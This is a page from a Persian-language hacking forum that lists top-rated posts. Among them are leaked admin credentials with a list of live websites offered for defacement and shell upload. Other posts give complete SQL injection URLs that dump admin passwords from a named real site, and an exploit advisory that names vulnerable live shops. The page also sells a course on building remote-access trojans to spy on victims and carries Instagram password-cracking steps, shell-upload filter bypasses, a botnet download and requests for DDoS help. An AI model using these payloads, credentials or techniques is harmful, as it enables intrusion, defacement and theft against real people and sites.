رفتن به مطلب
انجمن تیم امنیتی گارد ایران

پرچمداران

  1. Mr.Python

    Mr.Python

    مدير بخش


    • امتیاز

      419

    • تعداد ارسال ها

      476


  2. OOOHHHAAACCCKKKOOO

    OOOHHHAAACCCKKKOOO

    کاربر تازه وارد


    • امتیاز

      309

    • تعداد ارسال ها

      107


  3. mownten

    mownten

    مدير بخش


    • امتیاز

      239

    • تعداد ارسال ها

      279


  4. RedNofozi

    RedNofozi

    کاربر تازه وارد


    • امتیاز

      237

    • تعداد ارسال ها

      106



مطالب محبوب

در حال نمایش مطالب دارای بیشترین امتیاز از زمان پنجشنبه, 30 فروردین 1397 در همه بخش ها

  1. 14 امتیاز

    نگارش 1.0.0

    26 دریافت

    بسم الله الرحمن الرحیم با سلام پکیج آموزشی کالی لینوکس تماماً توسط تیم گارد ایران تهیه شده و تمامی آموزش ها همراه با مثال برای شما عزیزان ضبط شده. ویدو ها از کیفیت بالا برخوردار هستن و در کنار آموزش کالی لینوکس ، آموزش های دیگری هم قرار داده شده. مثل : آشنایی با دستورات لینوکسی ، برنامه نویسی در کالی لینوکس ، بش نویسی ، ابزارهای مورد نیاز در آموزش ها و... توضیحات: این پکیج بیش از 100 آموزش تصویری همراه با ابزار های مورد نیاز هست که حجم فشرده نشده این پکیج حدود 4 گیگابایت است. حجم فشرده شده و آپلود شده در انجمن 380 مگابایت است. این پکیج در کمترین زمان از شما یک حرفه ای لینوکس میسازه😎

    600٬000 ریال

  2. 11 امتیاز
    گفتم که من نفرستادم با تشکر یک بار فرستادم سیستم هنگ کرده بود خودش فرستاد.
  3. 11 امتیاز
    حداقل آموزش down کردن دایمی سایت رو می گفتین. گفتم که هنگ کرده بود سیستم خودش چند بار فرستاد.
  4. 11 امتیاز
    خب تایپک های در اون مورد رو اگه زحمتی نیست بزارین لینکش رو. البته اگه زحمت نمیشه.
  5. 11 امتیاز
    با سلام خدمت مدیران و کاربران محترم. میخواستم بدونم که چطور میشه با داشتن آی پی اینترنتی آی پی سخت افزاری شخصی رو بدست آورد؟
  6. 11 امتیاز
    با سلام خدمت مدیران و کاربران محترم. چند روز قبل راجب حمله ی بروت فورس با نت پد در آدرس https://www.aparat.com/v/4tqPM/rute_force_با_notepad_و_vbs. ویدیویی را دیدم. میخواستم بدونم این کار امکان پذیره یا نه؟اگه میشه لطفا راهنمایی کنید چون من نفهمیدم ویدیو دقیقا چی میگه. اگه هم نمیشه آموزش بروت فورس رو با Cain بزارید.ممنون. کدی هم که استفاده شده این هست: Set objFSO = CreateObject("scripting.FilesystemObject") Set objFile = objFsO.OpenTextFile("C:\test.txt", For Reading) set wshShe11 = WScript.CreateObject("WScript.She11") wscript.sleep (10000) const For Reading = 1 Dim strPasssword Do Until objFile.AtEndOfstream wshshe11.sendkeys "+{HOME}" wshshe11.sendkeys "lmr.t@t0l" wshshe11.sendkeys "{TAB}" strPassword = obfile.Readline wshshe11.sendkeys strPassword wshshe11.sendkeys "~" wshshe11.sendkeys "{ENTER}" wshshe11.sleep (50) Loop البته بگم که من کد رو خودم از رو ویدیو نوشتم و چون کیفیتش یکم پایین بود شاید درست نباشه . من کد رو در فایلی با فرمت VBS ذخیره کردم که باز نمیشه چون تو این فرمت نباید این جور متن نوشت. من نمیدونم چطور از فایل استفاده کنم که بشه حمله رو انجام داد. لطفا راهنمایی کنید، با تشکر.
  7. 11 امتیاز
  8. 11 امتیاز
    ببخشید دیگه تکرار نمیشه. واقعا ببخشید.
  9. 11 امتیاز
    واقعا کسی نمیدونه؟
  10. 10 امتیاز
    • بنام خدا • سری اموزش های ساخت مرورگر پیشرفته ی وب قسمت دوم ساخت مرورگر پیشرفته وب . توضیحات : نوع فایل : ویدئو صدا : دارد حجم : پارت 20 مگابایت رمز فایل : guardiran.org دوستان پارت یک و پارت دو باهم تهیه شده اما بخاطر محدودیت حجم اپلود سایت به دو پارت تقسیم شده . پارت دوم ادامه پارت اول هست که قرار میدم جفتشون رو باهم دانلود کنید و ببینید ♥ حمایت بشیم پارت های بعدی رو سریع تر قرار میدیم باتشکر ♥ Browser_Part2.rar
  11. 10 امتیاز
    بسم الله الرحمان الرحیم این مطلبو مینویسم چون بار ها شاهد این بودم که کاربرا سهوا یا عمدا میان مطالب خیلی قدیمی و اشتباهی رو میزارن در انجمن زین پس اگر بنده مطالبی رو که ببینم بار علمی نداشته و درست نیستن یا کاربری که مطلبی رو ارائه میکنه و در جواب اون مطلب نمیتونه توضیح کاملی ارائه بده مطلب اون کاربر بلا فاصله پاک شده یا ویرایش خواهد شد پس تقاضا میکنم در ارائه مطالب خودتون نهایت دقت رو داشته باشید نکته اصلی که بنده همیشه مینویسم کلمه مطالعه هستش پس ممنون میشم در مورد مطلبی که میخواین ارائه کنین حداقل 15 دقیقه جستجو کنین و کامل بخونینش اگر خودتونو قانع کرد اونوقت زمان ارائه اون مطلب هستش با سپاس فراوان
  12. 10 امتیاز
    خب حداقل راهنمایی میکردین که چرا نمیتونم اون برنامه رو باز کنم.
  13. 10 امتیاز
    میدونم تو انجمن هم جستجو کردم چیز زیادی نفهمیدم در ضمن منظور من قطع ارتباط کلی اینترنت طرف نیست فقط قطع ارتباط اون شخص تا مثلا چند دقیقه.
  14. 10 امتیاز
    ببخشید چند سوال رو در یک تاپیک می پرسم. حمله ی قطع ارتباط از اینترنت چطور انجام میشه؟ یعنی مثلا با داشت آی پی اینترنتی یک شخص، ارتباط اون شخص رو با اینترنت قطع کرد. اگه با آی پی اینترنتی نمیشه با آی پی سخت افزاری میشه؟ منتظرم پاسخ های دقیقتون هستم، با تشکر.
  15. 10 امتیاز
    روی سایت میخوام انجام بدم. ولی مثل این که با نت پد نمیشه.
  16. 10 امتیاز
    روی سایت دوست عزیز.
  17. 10 امتیاز
    یعنی کسی نیست؟
  18. 9 امتیاز
    REX

    فراتر از جستجو

    به طور کلی هنگامی که ما میخواهیم یک متن خاص را جستجو کنیم، مرورگر مورد علاقه خود را باز می کنیم، به موتور جستجوی وب می رویم و برخی از کلمات مربوط به آن را تایپ می کنیم. بسته به اینکه چگونه جستجو را انجام می دهیم، نتایج بیشتری را به دست می آوریم با جستجوگرها کارهای خیلی مفیدی میتوان انجام داد و خیلی زیاد مطلب اموزشی میتوان قرار داد. در این متن نسبتا کوتاه قست دارم از کاربرد جستوگرها برای نفوذگرها و نحوه ی استفاده آنها برای گرفتن اطلاعات مورد نیاز مطالبی رو خدمت شما کاربران گاردایران ارایه دهم , وقتی که صحبت از جستجوگر و نفوذ کنار هم میان ذهن اکثر شما عزیزان به سمت Google Hacking و استفاده از Dork ها جهت شناسایی اسیب پذیریها میرود, اما همه جیز در اینجا خلاصه نمیشود. بعد از توضیحاتی کوتاه راجع به جستجوگرها چند جستجوگر که بسیار زیاد برای نفوذگرها قابل اهمیت و پرکاربرد هستند را معرفی خواهم کرد .جستجوگرها بر این اساس دسته بندی میشوند : Crawler based search engines Human powered directories Hybrid search engines Other special search engines Crawler based search engines همه موتورهای جستجوی مبتنی بر خزنده از یک خزنده عنکبوت برای خزیدن و نمایه سازی محتوای جدید به پایگاه داده جستجو استفاده می کنند, هر موتور جستجوگر مبتنی بر خزنده 4 مرحله را برای جستجو دنبال میکنند. Crawling Indexing Calculating Relevancy Retrieving the Result واژه Crawling رو شما در تمام ابزارهای تست نفوذ و اسکنر های وب مشاهده کردید , spider تمام محتوای تک تک پیج ها و لینک های درون صفحات را شناسایی میکند و فهرست میکند سپس کاربران از میان این اطلاعات ذخیره شده، آنچه را که می‌خواهند جستجو می‌کنند. اگر شما در صفحه وب خود تغییراتی را اعمال نمایید، موتورهای جستجوی پیمایشی آنها را به طور خودکار می‌یابند و سپس این تغییرات در فهرست ها اعمال میکنند. Human powered directories این نوع وابسته به کاربرانی است که آن را تکمیل می‌کنند, کاربر صفحه مورد نظر را به همراه توضیحی کوتاه در فهرست ثبت می‌کند یا این کار توسط ویراستارهایی که برای آن فهرست در نظر گرفته شده، انجام می‌شود. عمل جستجو در این حالت تنها بر روی توضیحات ثبت شده صورت می‌گیرد و در صورت تغییر روی صفحه وب، روی فهرست تغییری به وجود نخواهد آورد. Hybrid search engines موتورهای جستجو ترکیبی از هر دو فهرست خزنده و دستی برای فهرست سایت ها در نتایج جستجو استفاده می کنند. بیشتر موتورهای جستجوگر مبتنی بر خزنده مانند گوگل اساسا از خزنده ها به عنوان مکانیسم اولیه و Human powered به عنوان مکانیسم ثانویه استفاده می کنند, موتورهای جستجو بیشتر این روزها به یک مدل مبتنی بر ترکیبی حرکت می کنند. خیلی کوتاه توضیح دادم توضیحات جامع تری در این باره در فضای مجازی مطالعه کنید. 5 جستجوگر مطرح مخصوص هکرها : #1 SHODAN #2 censys #3 ZOOMEYE #4 IVRE #5 PUNKSPIDER به زودی آموزش های تصویری استفاده از این جستجوگرها در انجمن قرار خواهد گرفت با ما همراه باشید. امیدوارم این مقاله مفید واقع شده باشد. موفق و سربلند باشید . تیم امنیتی گارد ایران.
  19. 9 امتیاز
    • بنام خدا • سری اموزش های ساخت مرورگر پیشرفته ی وب با سلام خدمت دوستان . اومدم دم عیدی به دوستداران سی شارپ یه حال بدم 😀 اگه حمایت بشیم اموزش ها با سرعت بیشتری تهیه میشه و در خدمت شما عزیزان قرار میگیره . توضیحات : طراحی صفحه مرورگر کد نویسی مرورگر ساخت دیتابیس ست کردن دیتابیس با نرم افزار کد نویسی دیتابیس طراحی قسمت های پیشرفته ی مرورگر مانند History , Favorite و... قسمت اول بزودی ... حمایت کنید
  20. 9 امتیاز
    بسمه تعالی با سلام خدمت کاربران عزیز انجمن گاردایران امروز تصمیم گرفتم که با استفاده از یک دورک و حمله از طریق باگ Sql Injection آموزشی در خصوص نفوذ و دیفیس یک وبسایت خارجی تهیه کنم براتون. ابزار ها رو هم پیوست کردم. به ویدیو دقت کنید. هر سوالی داشتید اینجا تاپیک بذارید تا جواب بدم: http://guardiran.org/forums/forum/19-سوال-و-جواب-های-نفوذ-به-سایت-ها-و-سرورها-و-روشهای-مقابله/ ابزارها : Sqli Dumper Admin Login Finder دورک : Issue.php?categoryID= ویدیو آموزشی و فایل ها در 8 پارت هست رمز عبور : guardiran.org How to Hack a website with Sql Injection - Guardiran Security Team.part04.rar How to Hack a website with Sql Injection - Guardiran Security Team.part01.rar How to Hack a website with Sql Injection - Guardiran Security Team.part02.rar How to Hack a website with Sql Injection - Guardiran Security Team.part03.rar
  21. 9 امتیاز
    سلام دوستان و مدیران محترم. سوال داشتم که چگونه حمله ی DDOS رو به صورت کلی (یعنی سایت برای همیشه از کار بیفتد) انجام بدم؟ البته بشه از آدرس اون سایت استفاده کرد. مثلا به یک وبلاگ با آدرس masalaninsite.blogfa.com حمله کنیم و سایت از کار بیفته ولی بعدا همین آدرس رو بتونیم تو توسعه دهنده وبلاگ (که اینجا بلاگ فا هست) ثبت کنیم. البته اگه نشه مشکلی نیست اینکه کلا از کار بیفته برام مهمه. به این وبلاگ نمیخوام حمله کنم ها برای مثال فقط گفتم. راستی در باز کردن Anonymous External Attack در ویندوز 7 مشکل دارم باز نمیشه ارور میده: check online for a solution and close the program یک ارور دیگه هم میده که پایین عکسش هست. خود برنامه رو هم پیوست کردم. لطفا راهنمایی کنید، با تشکر. Anonymous External Attack.exe
  22. 9 امتیاز
    با سلام. بنده برای بخش هکینگ اعلام آمادگی می کنم. البته اگه یه بخش بتواند چند مدیر داشته باشد!!! اگه هم نشد در بخش تروجان ، کیلاگر و ویروس آمادگی دارم.
  23. 9 امتیاز

    نگارش 1.0.0

    18 دریافت

    بسم الله الرحمن الرحیم تیم امنیتی گارد ایران در راستای بالا بردن سطح دانش شما دوستان گرامی اقدام به ساخت پکیج جامع ساخت رت با زبان سی شاپ کرده است که با گزراندن این دوره ارزشمنده دیگر نیازی به رت های آماده ندارید. پس از گزراندن این دوره شما با نحوه کار رت و روش مقابله آن آشنا خواهید شد. این پکیج شامل 13 ویدیو آموزشی میباشد که به جرعت میتوانم بگویم همچین پکیجی در هیچ سایتی وجود ندارد و مختص به گارد ایران میباشد. مدرس : آقای ادریس شریفی سر فصل های آموزشی: معرفی دوره و سخنی با شما آشنایی با مقدمات شبکه آشنایی با رت و ساخت بکدور در متااسپلویت آموزش پورت فورواردینگ به نحوه درست و رفع مشکلات عدم باز شدن پورت آشنایی با سوکت و نحوه استفاده از اون چت کردن با قربانی و ارسال پیغام هشدار آپلود و دانلود فایل از سیستم قربانی دیدن وبکم قربانی به طور زنده دیدن دسکتاپ قربانی به طور زنده اجرای دستورات ریموت شل و آشنایی با نکات مهم و کاربردی در ساخت رت و.... قابل توجه خریداران و اعضای تیم : اگر به خوبی از این پکیج استقبال بشود ورژن 2 نیز ساخته خواهد شد که در آن نکات بسیار حرفه ای تر را خواهیم گفت .

    300٬000 ریال

  24. 8 امتیاز
    In The Name Of God با سلام خدمت دوستان و مدیران عزیز : اسکریپتی که قرار میدم اسکریپت پورت اسکنر هست و فوق العاده ساده و کاربردی و کم حجم به زبان پایتون هست ! تمام پورت های باز یک سایت فقط با وارد کردن ادرس سایت به شما نشون میده ! (البته اینم اضافه کنم نمونه کامل این اسکریپت میشه ابزار قوی انمپ که خب گفتم این هم بزارم برای تازه وارد ها بد نیست) #!/usr/bin/env python import socket import subprocess import sys from datetime import datetime # Clear the screen subprocess.call('clear', shell=True) # Ask for input remoteServer = raw_input("Enter a remote host to scan: ") remoteServerIP = socket.gethostbyname(remoteServer) # Print a nice banner with information on which host we are about to scan print "-" * 60 print "Please wait, scanning remote host", remoteServerIP print "-" * 60 # Check what time the scan started t1 = datetime.now() # Using the range function to specify ports (here it will scans all ports between 1 and 1024) # We also put in some error handling for catching errors try: for port in range(1,1025): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) result = sock.connect_ex((remoteServerIP, port)) if result == 0: print "Port {}: Open".format(port) sock.close() except KeyboardInterrupt: print "You pressed Ctrl+C" sys.exit() except socket.gaierror: print 'Hostname could not be resolved. Exiting' sys.exit() except socket.error: print "Couldn't connect to server" sys.exit() # Checking the time again t2 = datetime.now() # Calculates the difference of time, to see how long it took to run the script total = t2 - t1 # Printing the information to screen print 'Scanning Completed in: ', total اگر استقبال شد اسکریپت های اسکن پشرفته تری میزارم و اگر جایی از کد نیاز به توضیح داشت درخدمتم !
  25. 8 امتیاز
    • بنام خدا • سری اموزش های ساخت مرورگر پیشرفته ی وب قسمت اول ساخت مرورگر پیشرفته وب . توضیحات : نوع فایل : ویدئو صدا : دارد حجم : پارت یک 20 مگابایت رمز فایل : guardiran.org دوستان پارت یک و پارت دو باهم تهیه شده اما بخاطر محدودیت حجم اپلود سایت به دو پارت تقسیم شده . پارت دوم ادامه پارت اول هست که در پست بعدی قرار میدم جفتشون رو باهم دانلود کنید و ببینید ♥ حمایت بشیم پارت های بعدی رو سریع تر قرار میدیم باتشکر ♥ Browser_Part1.rar
  26. 8 امتیاز
    پارت های 5 الی 8 : How to Hack a website with Sql Injection - Guardiran Security Team.part07.rar How to Hack a website with Sql Injection - Guardiran Security Team.part08.rar How to Hack a website with Sql Injection - Guardiran Security Team.part05.rar How to Hack a website with Sql Injection - Guardiran Security Team.part06.rar
  27. 8 امتیاز
    ############################################ # Title : WebCzech CMS Sql Injection Vulnerability # Author : Guardiran Security Team # category : webapps # Tested On : Win 10 , Kali Linux # Vendor HomePage : https://www.webczech.cz # Google Dork : intext:"e-shop system WebCzech " inurl:/.php?id= ############################################ # PROF: http://www.general-store.cz/static.php?id=5' [Sql injection Vulnerability] http://www.kozena-penezenka.cz/static.php?id=13'[Sql injection Vulnerability] http://eshop.pozarnizbrojnice.cz/static.php?id=1'[Sql injection Vulnerability] http://www.restaurace-retro.cz/eshop/static.php?id=1'[Sql injection Vulnerability] # Discovered by : sir shahroukh ############################################ https://cxsecurity.com/issue/WLB-2019010203 ############################################
  28. 8 امتیاز
    بیشتر از 50 تارگت برای دیفیس داره و حتی میتونید شل آپ کنید // به نام تیم ثبت کنید (پسورد رو عوض نکنید تا همه بتوانند استغاده کنند حتی برای موارد تمرینی و بقیه موارد) بعضی از تارگت ها رو لیست کردم اما همه تارگت ها در وندور مشخص هست user admin : admin password : applezeed9 vendor : http://applezeed.com/portfolio.php http://www.grandtourismo.co.th/backend http://www.nicetrip.co.th/backend http://www.naratelbangkok.com/backend http://www.lookrig.com/backend http://www.overallsystemtrade.com/backend/ http://www.oldiesmusicthailand.com/backend/ http://www.melogistic.com/backend/ http://www.istyletraveler.com/backend/ http://www.sandasiamtour.com/backend/ ------------------------------------------------- موفق باشید
  29. 8 امتیاز
    با سلام امروز با اموزش کرک اینستاگرام با ترموکس(termux) در خدمت شما هستم... ترموکس یک ابزار اندرویده که میتونید اون رو از گوگل پلی دانلود کنید(نیازمند اندروید5+) خب بریم سراغ آموزش اول باید وارد برنامه ترموکس شیم و با دستورات زیر ابزار هارو اپدیت کنیم apt update apt upgrade یادتون باشه هرجا [n/y] اومد y رو بزنید و بعد اینتر بزنید تا دانلود و نصب کامل شه حالابا دستورات زیر ابزار های مورد نیاز رو دان میکنیم pkg install git pkg install python pip install requests pip install wordlist یادتون باشه یکی یکی باید بزنید خب حالا با دستور git اکسپلویت کرک اینستارو دان میکنیم به اینصورت git clone https://github.com/avramit/instahack.git دوستان هیچ چیزیو جا نزارید حالا یه (ls (LSبزنید ببینید اکسپلویت دان شده یا نه اگه نشده بدونید یجاییو اشتباه زدید خب حالا با دستور cd وارد پوشه اینستا هک میشیم به این صورت cd instahack حالا ls میزنیم حالا باید فایل pass.txt رو حذف کنیم و یه پسورد لیست جدید بسازیم برای حذف فایل از دستور زیر استفاده میکنیم rm -f pass.txt حالا ls بزنید میبینید فایل حذف شده حالا با دستور زیر یه پسورد لیست میسازیم wordlist -m 4 -M 6 -o pass.txt -v 123456 حالا کار تمومه کافیه بزنید python hackinsta.py بعد یوزنیم طرف رو بزنید بعد n رو بزنید و بعد 1 رو بزنید شروع به کرک میکنه موفق باشید
  30. 8 امتیاز
    با سلام خدمت همکاران و مدیران محترم. چطور میشه به کل کدنویسی سایت دسترسی پیدا کرد؟ منظورم هر کد نویسی حتی این که رمز های ورود کجا ذخیره بشن. اصلا امکان پذیر هست؟ منتظر پاسختون هستم. با تشکر.
  31. 8 امتیاز
    راستی من یک اشکال امنیتی در سایت شما پیدا کردم. نمی دونستم باید کجا بگم بخاطر همین در بخش سوال و جواب در این جا گفتم. لطفا اکانتم رو بن نکنید آخه نمی دونستم کجا باید می گفتم.
  32. 8 امتیاز
    اسکریپت راهنما و کنترل سرویس Tor . مخصوص ویندوز . امکانات : راهنمای استفاده و نصب تور - کنترل و تنظیم شبکه تور - نمایش مشخصات پروسه تور در ویندوز (نام و session و pid و مقدار مصرف مموری ) - اجرا به عنوان nt-service - تنظیم و اجرای پورت ها و هاست ها هم به صورت اتوماتیک هم دستی) - نمایش پروسه و اطلاعات تکمیلی اتصال های تور . دستور زیر را در محیط command prompt وارد کنید: TorProject --help یا TorProject -h اتصال با مقادیر پیش فرض : TorProject نمایش ورژن تور : TorProject --version اطلاعات پروسه تور : TorProject --info قطع اتصال و بستن تور : TorProject --kill اتصال با مقادیر کاربر و به صورت دستی: TorProject -cp 9151 -sp 9150 --nt-service --host 127.0.0.1
  33. 8 امتیاز
    https://arazi.gov.af/dari/mosawabat/moswabatdetails.php?id=39
  34. 8 امتیاز
    سلام با آموزش تست نفوذ به شبکه وایرلس با استفاده از سیستم عامل کالی لینوکس در خدمت شما هستیم. ابزار استفاده شده در فیلم: https://github.com/esc0rtd3w/wifi-hacker.git پسورد فایل زیپ: guardiran.org pentest wireless with kali.zip
  35. 7 امتیاز
    عرض ادب و شادباش بمناسبت سال جدید خدمت تمامی گاردایرانی های عزیز و تمام بازدیدکنندگان انجمن , با افتخار از سال 93 در خدمت شما بودیم و اینک وارد سال 98 شدیم در طول این 5 سال انجمن با مشکلات زیادی روبرو بود که مدیریت انجمن و تمام مدیران با تلاش هایی که داشتند تا جایی که در حد توان بود بستری فراهم کردند تا این مشکلات کمتر به چشم شما عزیزان بیاد , طبق صحبت هایی که با مدیریت کل انجمن داشتیم انشالله امسال شما عزیزان شاهد تغییرات مثبت زیادی در انجمن خواهید بود و تمام نقاط ضعف برطرف خواهند شد که این تغییرات کلی شامل نوع فعالیت و ظاهر انجمن و برخی دیگر مسایل میشود که به زودی اطلاع رسانی میکنیم. به پاس 5 سال همراهی و حضور شما در انجمن از تمامی مدیران و تمام کاربران گاردایران قدر دانی میکنیم. --- از دوستان هم بخاطر حضور کمرنگ بنده در این روزها عذرخواهی میکنم در حال خدمت مقدس سربازی هستم. باز هم از طرف تیم امنیتی گاردایران آغاز سال جدید رو به شما و خوانواده های محترمتان تبریک عرض میکنم.
  36. 7 امتیاز
    سلام امروز یک کرکر واسه بازی پر طرفدار زولا نوشتم امیدوارم خوشتون بیاد اینم لینک اسکن https://www.virustotal.com/#/file/db1941c76e8dbf710e97f52a98e3e08ad76203c23f146cab9236c53d0131c1e9/detection ZAC.py
  37. 7 امتیاز
    39-Target-for-Sqli Dumper.rarسلام. تعداد 39 تارگت آماده مربوط به Sqli Dumper تهیه کردم که میتونید باهاش تمرین کنید. فایل رو پیوست کردم که اگر خواستید import هم بکنید. رمز عبور : guardiran.org
  38. 7 امتیاز
    به نام خدا سلام دوستان و مدیران عزیز اسکریپتی که معرفی میکنم یکی از بهترین اسکریپت ها برای گرفتن پراکسی های آنلاین در شبکه هست که فوق العاده این اسکریپت کاربرد داره و این که به شما میگه کدام پراکسی در سطح لول بالاتر و مدت زمان انلاینی بیشتری داره ! لینک اسکن = Scan Link fetch-some-proxies.zip
  39. 7 امتیاز
    In The Name Of God ممنون دوستان عزیز خب اینبار یکم تخصصی ترش میکنیم اسکریپت و از گیت هاب میخوام بهتون یه اسکریپت جالب معرفی کنم به نام نت اسکن که همراه با لینک دانلود لینک اسکنش هم قرار میدم لطفا قبل از استفاده فایل درباره من حتما مطالعه کنید ! لینک اسکن : Scan Link Nscan-master.zip
  40. 7 امتیاز
    پروژه PyCk یک کالکسیون از ابزارهای بدرد بخور پایتون در زمینه هکینگ رو در خودش داره البته شاید زیاد ابزارها حرفه ای نباشن چون جنبه آموزشی هم دارن و برای کسایی که میخوان تست نفوذ با پایتون رو یادبگیرن به شدت توصیه میشه... پیشنهاد میکنم یه نگاهی بهش بندازین https://github.com/Naategh/PyCk
  41. 7 امتیاز
    DAN_B

    نکات جالب گوگل

    *سلام امیدوارم که از این تاپیک استقبال بشه* دیدم تاپیک جالبی میشه گفتم شروعش کنم... واسه شروع 5 مورد رو میزارم 1-توی گوگل سرچ کنید spinner یه اسپینر واستون میاره که جالبه 2-این رو سرچ کنید super mario bros و روی تصویر جعبه ای که علامت سوال داره کلیک کنید 3-این هم خیلی جالبه حتما یه سر بزنید https://www.google.com/sky 4-سرچ کنید solitaire و روی Click to Play کلیک کنید 5- این هم همون بازی xo هستش به صورت آنلاین، سرچ کنید tic tac toe
  42. 7 امتیاز
    بات نت اول که میخوام معرفی کنم ، اسمش µBot هست ../ مبتنی بر : IRC آموزش نصب : لینک یوتیوب پسورد فایل : guardiran.org تصاویری از محیط بات نت µBot.rar
  43. 7 امتیاز
    virtual_hate

    آپلود شل

    سلام دوست عزیز از چه باگی برای نفوذ استفاده کردید ؟ شما از یک نرم افزاری برای ویرایش درخواست ها استفاده کنید (مثل burp suite) و ابتدا از بایپس پسوند شروع کنید مثلا از php1,php2,php3,php4,php5 shell.jpg.php shell.php%00.gif در مواردی هم سایت نوع فایل ارسالی رو علاوه بر پسوند رو بررسی میکنه برای یادگیری این بایپس MIME type ها رو بررسی کنید. در بعضی موارد هم محتوای فایل رو بررسی میکنه که بیشتر دنبال تگ های مثل تگ شروع php هستند به عنوان مثال: <?php phpinfo(); ?> که به قسمت <?php حساس هست و شما تگ باز و بسته php درون شل رو باید بصورت زیر تغییر بدید. <? phpinfo(); ?>
  44. 7 امتیاز
    0r0b4s

    OPSEC چیست؟

    با سلام خدمت شما دوست عزیز این عبارت چنتا معنی داره و در چنتا جا بکار میره و بنده درمورد چیزی که به بحت ما مربوطه رو میگم این عبارت در مقاله Security and Loss و What is Operations Security (OPSEC)چنین مطرح شده که یه روش سیستماتیک برای شناسایی، کنترل و حفاظت از اطلاعات در مرحله بحرانی استفاده می شه بعد در این روش بر روی نگهداری اطلاعات بطوریکه اونارو از دست ندین در یک مقاله دیگه هم Security Threads چنین بیان شده که این سیستم رخداد هارو لحظه به لحظه رسیو کرده وعمل مانیتورینگ رو روشون انجام میده بطوری که اگر در یکی از رخداد های دریافتی خللی باشه اونو و نحوه ایجاد خلل رو بهتون میگه چندین شرکت مطرح دنیا هم از این روش استفاده میکنن برای فیکس کردن موارد رخ داده احتمالی چیزی که داره خوبه اینه که میتونه سناریو هایی رو طبق شما اجرا کنه که اگر در این سناریو شما به مشکل برخوردین بهتون نشون میده که مشکل از کجا بوجود اومده و باید حل بشه در بعضی مقاله ها هم برای مقابله با کارتهای تقلبی و مارک های تقلبی و اسناد و ارز های تقلبی به کار رفته شده و در اخرین مقاله که خوندم چنین نوشته بود برای کلمه شما تامین و خدمات ردیابی، نظارت و تجزیه و تحلیل آنلاین و تجارت الکترونیک برای هزاران شرکت در بخش های صنعت رو گروهی بر عهده گرفتن که شده OpSec Security Group بازم نمیدونم شاید بنده اشتباهی متوجه منظور شما شدم دوست عزیز امیدوارم درک کلی داده باشم در سایه حق
  45. 7 امتیاز
    LHOST یعنی همون Local Host یا هاست محلی . شبکه محلی یعنی چی ؟ وقتی دو یا چند سیستم تو یه خونه / محل کار / یا یه گروه محدودی بهم متصل بشن (شبکه بشن) یک شبکه محلی یا Local داریم . آی پی های شبه محلی همگی از نوع ipv4 هستند . مفاهیم ipv4 و ipv6 نوعی الگوریتم ساخت ای پی هستند که به راحتی تو اینترنت میتونید در موردشون هزاران مطلب پیدا کنید.که بسته به روتر یا مودم شما محدوده ی خاصی رو شامل میشه . آی پی لوکال فقط تو اون محدوده شناخته شدست مثلا آی پی لوکال سیستم من 192.168.1.3 هست . ای آی پی تو شبکه ی خونه من به کامپیوتر من اشاره میکنه اما تو سطح جهانی شناخته شده نیست . myip که تو گوگل میزنید آی پی پابلیک public یا valid ip شما رو نشون میده که آی پی جهانی هست یعنی این آی پی مختص شبکه شماست . دیگه ضایعست که بازم بخوام بگم تو اینترنت سرچ میکردی جواب میگرفتی ! مطالب در مورد شبکه خیلی مفصل هست برا درک بهتر network+ رو مطالعه کنید . و من شاید به درستی مطلب رو نرسونم. LPORT هم همون مفهوم بالارو داره و به پورت اشاره میکنه . یه پورتی که توی مودم یا روتر شما آزاد هست (پورت باز) . برای دریافت و انتقال اطلاعات به یه گذرگاه یا درگاهی احتیاج دارید که اطلاعات از طریق اون رد و بدل بشن که پورت میگیم . بازهم به طور مفصل تو اینترنت هست راجبش. شما وقتی یک تروجان یا رات درست میکنید باید آی پی جهانی خودتون رو بهش بدید یعنی آی پی public .مثلا من میخوام از تهران به یه شخصی تو جنوب کشور یه برنامه مخرب بفرستم . خب باید توی تروجان آی پی پابلیک رو قرار بدم چون اون شخص توی خونه ی من یا محل کار من نیست یا تو اتاق من نیست و باهم به یه مودم وصل نیستیم . پس باید آی پی پابلیک رو بدم بهش. پس موقع درست کردن تروجان یا رات آی پی پابلیک رو میدید اما موقع درست کردن یه listener باید ای پی لوکال رو بدید . دلیلش هم مفصله شما باید با شبکه و سوکت نویسی و پورت و مفاهیم Connection oriented و connection closed اشنا باشید . دلیل اینکه توی مجازی ساز شما وای فای رو پیدا نمیکنید هم مشخصه . داریم میگیم مجازی ساز همه چی مجازی ساخته میشه . اشتباه خیلیا اینه که بعد از اینکه با یه سیستم عامل اشنا میشن و تو یجا میخونن فلان سیستم عامل روی مجازی ساز نصب کنید و غیره ، سریع میرن مجازی ساز نصب میکنن . اصلا باید بدونید مجازی ساز چیه مزایاش چیه معایبش چیه نه اینکه همینجوری نصب کنید . اینجور موارد نیاز دارن که در موردشون شناخت داشته باشید . شما میتونید یه قسمتی از هارد رو خالی کنید و کالی رو به صورت Dual boot یا کنار ویندوز روی اون پارتیشنی که خالی کردید ، نصب کنید . خب البته مسلما نمیتونید همزمان استفاده کنید از دو سیستم عامل .
  46. 7 امتیاز
    با سلام. اول از همه از همه ی مدیران محترم عذر میخوام که از بحث دسترسی به کدنویسی سایت خارج شدم (در تاپیک دسترسی به کدنویسی سایت). بعد هم سوالم رو در رابطه با پسورد دیتابیس می پرسم. آیا پسورد دیتابیس ممکنه در برخی سایت ها همون پسورد ادمین پیج باشه؟ و این که قابل کرک شدن هست؟
  47. 7 امتیاز
    http://www.rightwaycargo.com/news_more.php?id=-37+UNION+ALL+SELECT+1,2,3,4,5,6--+ http://www.rightwaycargo.com/news_more.php?id=-37+UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),3,4,5,6--+ www.rightwaycargo.com/news_more.php?id=-37+UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x74626c5f61646d696e),3,4,5,6--+ http://www.rightwaycargo.com/news_more.php?id=-37+UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(0x3c666f6e7420636f6c6f723d7265643e,str_admin_user_name,0x3c2f666f6e743e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e,str_admin_password,0x3c2f666f6e743e)+FROM+tbl_admin),3,4,5,6--+ ادمین پیج : http://www.rightwaycargo.com/webadmin/index.php
  48. 7 امتیاز
